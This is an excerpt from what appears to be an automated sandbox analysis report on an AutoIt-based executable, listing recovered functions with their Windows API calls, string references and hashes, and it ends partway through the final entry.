Instruction ID: bd3102877fc0099e08b9d0f2aa20f6a4a777775f728219bd7cc8654a91847a0f
Opcode Fuzzy Hash: d74fe7c18b5536bd1b81330403518e8068d27a7b4cb70692084b0e52168835d6
Instruction Fuzzy Hash: 8D5100786087028FDB55CF18C480A2ABBF1BB99744F55895DF8858B321E331EC81CF86

Function 0040258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004025D4

Strings

|, xrefs: 004025A5

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 86e740b70c21fbe8585a60cbea83f61ce4c9f1e713117bc03643f8bd68f51151
Instruction ID: 82775d542377b66be230f19d989a1bef1b8b9169c9d662f06bbf35a25c74892d
Opcode Fuzzy Hash: 86e740b70c21fbe8585a60cbea83f61ce4c9f1e713117bc03643f8bd68f51151
Instruction Fuzzy Hash: 79310A71810119ABCF02EFA0CC89EEEBFB9FF08310F10016AF955BA1A1EB355956DB50

Function 00417A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00417B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00417B76

Strings

', xrefs: 00417ACA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 321c7ab52f917f5a356c6e22a491e85d73d5e166b28cccda5f919ad1191dbe23
Instruction ID: d0ef7c3459e39d27b58508383d23def2457095d0d826bf58c776ae9482f808d4
Opcode Fuzzy Hash: 321c7ab52f917f5a356c6e22a491e85d73d5e166b28cccda5f919ad1191dbe23
Instruction Fuzzy Hash: 08413974A083099FDB14CF64C980BEABBB5FF08344F10416AE905EB341D774AA91CF94

Function 00416A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00416B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00416B53

Strings

static, xrefs: 00416AB3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c35f5171784f7162fbde5cc6cccc5077811cc70670d57b02118bbe252a8ad460
Instruction ID: d212e057cd54c5839fca19bf1eb7a8f2f905dcbea49b1f8a133095aaf6833c01
Opcode Fuzzy Hash: c35f5171784f7162fbde5cc6cccc5077811cc70670d57b02118bbe252a8ad460
Instruction Fuzzy Hash: FD318E71100604AADB119F68CC40BFB77A9FF48764F11852EF9A9D7190DB35EC82CB64

Function 003F28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003F2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003F294C

Strings

0, xrefs: 003F290A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8547ccafdbc6a5e4070c3d0dfe1d33ed0a4cc71906b756b5e93f970f04ffe247
Instruction ID: 87910726e4cef43da4e379378d1a9cc44b5229b911f1b6cc3dfb7175da4c6842
Opcode Fuzzy Hash: 8547ccafdbc6a5e4070c3d0dfe1d33ed0a4cc71906b756b5e93f970f04ffe247
Instruction Fuzzy Hash: DD31B13160030DDBEB26CF98C945BFFBBB8EF45350F150029EA85A71A1D7B09954CB51

Function 004166D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00416761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041676C

Strings

Combobox, xrefs: 0041672E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7a32bd946ab635f7ee2bafe7b10c436339b37bfa893016072c03f40064437767
Instruction ID: cd8d1018a7903117385e154edc65d785bf504aecb8aa6ea5e128f66cc5f355c1
Opcode Fuzzy Hash: 7a32bd946ab635f7ee2bafe7b10c436339b37bfa893016072c03f40064437767
Instruction Fuzzy Hash: 09118275300209AFEF11DF54DC81EFB376AEB483A8F11412AF928972D0D679DC9187A4

Function 00416C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00391D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00391D73
Part of subcall function 00391D35: GetStockObject.GDI32(00000011), ref: 00391D87
Part of subcall function 00391D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00391D91

GetWindowRect.USER32(00000000,?), ref: 00416C71
GetSysColor.USER32(00000012), ref: 00416C8B

Strings

static, xrefs: 00416C4E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 0133f0cb328e7bdc3c24be925fd579fe46e7aae6662fbce42a42ea63974f14af
Instruction ID: 65ed589aadccb772d4d3ffa002d9cc60b19d7952163cdcde89dd1d19087b1345
Opcode Fuzzy Hash: 0133f0cb328e7bdc3c24be925fd579fe46e7aae6662fbce42a42ea63974f14af
Instruction Fuzzy Hash: 94212972510209AFDF04DFA8CC45AFA7BA9FB08314F014629FD95D2250E635E891DBA4

Function 00416920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004169A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004169B1

Strings

edit, xrefs: 00416986

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 3e212537f1c3e96f43355a1370c04753acdca484e195d1fedccc04e2e7ed2f69
Instruction ID: 82a57f8c5b54cb0294a5fb389cfb30e5505e3213fa94d704b7779a56898a3b15
Opcode Fuzzy Hash: 3e212537f1c3e96f43355a1370c04753acdca484e195d1fedccc04e2e7ed2f69
Instruction Fuzzy Hash: B1118FB1120204ABEF108F74DC40AFB376AEB053B8F514726F9A5972E0C739DC959768

Function 003F29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003F2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003F2A41

Strings

0, xrefs: 003F2A18

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 4fd9c55994d438d95d7a9d69fb4219fc474810d2b5f05dd03a4f536abd3e3aed
Instruction ID: 5b611f01e9a18c62d9868140b3fa1432207eb0d43c440aeddf1af891f299b971
Opcode Fuzzy Hash: 4fd9c55994d438d95d7a9d69fb4219fc474810d2b5f05dd03a4f536abd3e3aed
Instruction Fuzzy Hash: B311D03291121CEFCF32EB98D845BBB77B8AB45300F064021EA55E72A0DB70ED0AC795

Function 004021D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0040222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00402255

Strings

<local>, xrefs: 0040221D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 500d4df12fb656b818dd7fbbca0d7ee91395b40cc93de677740c1e455032474a
Instruction ID: 27ca423e3caf3c35ca0bab04e898c980e8e67cf4c6bcf59f4095fab26399f647
Opcode Fuzzy Hash: 500d4df12fb656b818dd7fbbca0d7ee91395b40cc93de677740c1e455032474a
Instruction Fuzzy Hash: 97112070140221BADB248F918C88EFBFBA8FF06351F10827FF914661C0D2B45885D6F5

Function 003A092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00393C14,004552F8,?,?,?), ref: 003A096E

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

_wcscat.LIBCMT ref: 003D4CB7

Strings

SE, xrefs: 003A09AE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SE
API String ID: 257928180-1930506004
Opcode ID: 479f8a05f79ad1894ac20a1d9f55e33310509a5e6ad0ae2af34c68ea462c1371
Instruction ID: 5125c688d6a25e7a07d2ce4c7526590f782df333aa0f190e6faaa5e1bb47930b
Opcode Fuzzy Hash: 479f8a05f79ad1894ac20a1d9f55e33310509a5e6ad0ae2af34c68ea462c1371
Instruction Fuzzy Hash: C411C831A05208ABCB06FB64CC06EDE73F8EF09391F0044AABD48DB292EB70D7884715

Function 003E8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003E8E73

Strings

ComboBox, xrefs: 003E8E12
ListBox, xrefs: 003E8E3D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 2990da416d0b6c44d77d44bff0575350970e4d7d06c8410d0f2d352e444a510d
Instruction ID: 2b7496e9b1df99e06d94fd9e7319ed64e583acb784aec7497da3bf03f652e067
Opcode Fuzzy Hash: 2990da416d0b6c44d77d44bff0575350970e4d7d06c8410d0f2d352e444a510d
Instruction Fuzzy Hash: 2301F171A05228ABDF16EBA1CC419FE7368AF45320B140B19B825AB2E1DF315808C690

Function 003F8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003F8DAC
__fread_nolock.LIBCMT ref: 003F8DC1

Strings

EA06, xrefs: 003F8DF3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: b3f9e273e9178f825b87c45e26e0d4b9aeb250ba02fdf71f0a72f02ccbfff813
Instruction ID: 70325888f01103d8428a8a7e7154d43c73b8808b7b010116a72ff336dcb54e7d
Opcode Fuzzy Hash: b3f9e273e9178f825b87c45e26e0d4b9aeb250ba02fdf71f0a72f02ccbfff813
Instruction Fuzzy Hash: DF01D6718042186EDB29CBA88816FFEBBF89B15301F00459BF652D6581E974E6048760

Function 003E8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 003E8D6B

Strings

ComboBox, xrefs: 003E8D0A
ListBox, xrefs: 003E8D35

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7d5b082e699552f9c0fe177593e300221e5528b433e3efbf835bee1945aa3eee
Instruction ID: 6ce8ffafe1479039acdfe5cd8efd6066aa759c0d198b2368571472d32eabacf7
Opcode Fuzzy Hash: 7d5b082e699552f9c0fe177593e300221e5528b433e3efbf835bee1945aa3eee
Instruction Fuzzy Hash: 0601D471A41118ABDF16EBA1CD52AFF73A89F15300F100129B8056B2D1DE155E08D271

Function 003E8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 003E8DEE

Strings

ComboBox, xrefs: 003E8D8F
ListBox, xrefs: 003E8DBA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3cf5123dabc6a0666cb0c611447692e0e6eb4d7fe25a4fa71180565d6f808ab4
Instruction ID: 4487b0bc6673e5d07a2b4ae4210dda48bcf823d49bca045538102989ed2cd969
Opcode Fuzzy Hash: 3cf5123dabc6a0666cb0c611447692e0e6eb4d7fe25a4fa71180565d6f808ab4
Instruction Fuzzy Hash: D601F271A45218A7EF23EBA5CD52BFF73AC8F15300F100126B805B72D2DE259E09D271

Function 003EC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003EC534

Part of subcall function 003EC816: _memmove.LIBCMT ref: 003EC860
Part of subcall function 003EC816: VariantInit.OLEAUT32(00000000), ref: 003EC882
Part of subcall function 003EC816: VariantCopy.OLEAUT32(00000000,?), ref: 003EC88C

VariantClear.OLEAUT32(?), ref: 003EC556

Strings

d}D, xrefs: 003EC517

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}D
API String ID: 2932060187-1539258588
Opcode ID: 157e92424d7eb09cc1fc77a79d482d09f8762a74871f531eaca4656590eae857
Instruction ID: b93c7d91bb652e69e87ccb95d6bf693b4b3e6cf3a494b26debcc61c91a83edd1
Opcode Fuzzy Hash: 157e92424d7eb09cc1fc77a79d482d09f8762a74871f531eaca4656590eae857
Instruction Fuzzy Hash: 161100B19007089FC710DF9AD88499AF7F8FF18310B50862FE58AD7651E771AA49CB94

Function 003F4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 003F4F46
_wcscmp.LIBCMT ref: 003F4F58

Strings

#32770, xrefs: 003F4F52

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: f0d04f4ea9aef8ad8fe4cf4318fdac8039a28e74e45b4568eec9a2675bb89061
Instruction ID: e70fdf564af148bec3405aad0d52f309691e1c703369650df6a6946e7e66cbff
Opcode Fuzzy Hash: f0d04f4ea9aef8ad8fe4cf4318fdac8039a28e74e45b4568eec9a2675bb89061
Instruction Fuzzy Hash: 1BE0923260032C2AE7209A99AC49BA7F7ACEB85B61F01016BFD04D7051E9709A458BE4

Function 003CB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003CB314: _memset.LIBCMT ref: 003CB321

Part of subcall function 003B0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003CB2F0,?,?,?,0039100A), ref: 003B0945

IsDebuggerPresent.KERNEL32(?,?,?,0039100A), ref: 003CB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0039100A), ref: 003CB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003CB2FE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 676a0f8ea1f429c714515bca7788940768bb8e2ee3a9068240aebdd29b234dc0
Instruction ID: 1443817d11cfe301ed1a6e7988baa4c1c4ec40461cf78e66d8bd663e343c7066
Opcode Fuzzy Hash: 676a0f8ea1f429c714515bca7788940768bb8e2ee3a9068240aebdd29b234dc0
Instruction Fuzzy Hash: 23E092742007408FD722DF28E606786BBE8AF04304F00897DE496C7751EBF9E808CBA1

Function 003E7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003E7C82

Part of subcall function 003B3358: _doexit.LIBCMT ref: 003B3362

Strings

Error allocating memory., xrefs: 003E7C7B
AutoIt, xrefs: 003E7C76

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 06d962cfce1cf54e6ec5f937ddc170127e0259a4ff48f63ece0276960124e8df
Instruction ID: 422e7267def3a9fefaae817e7b5be97f5f93eb3e945cb1ac153b6e87ad67552e
Opcode Fuzzy Hash: 06d962cfce1cf54e6ec5f937ddc170127e0259a4ff48f63ece0276960124e8df
Instruction Fuzzy Hash: 41D05B323C436836D11732A5AC07FCB75884F15B56F144426FB089D5D349D5958251ED

Function 003D1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 003D1775

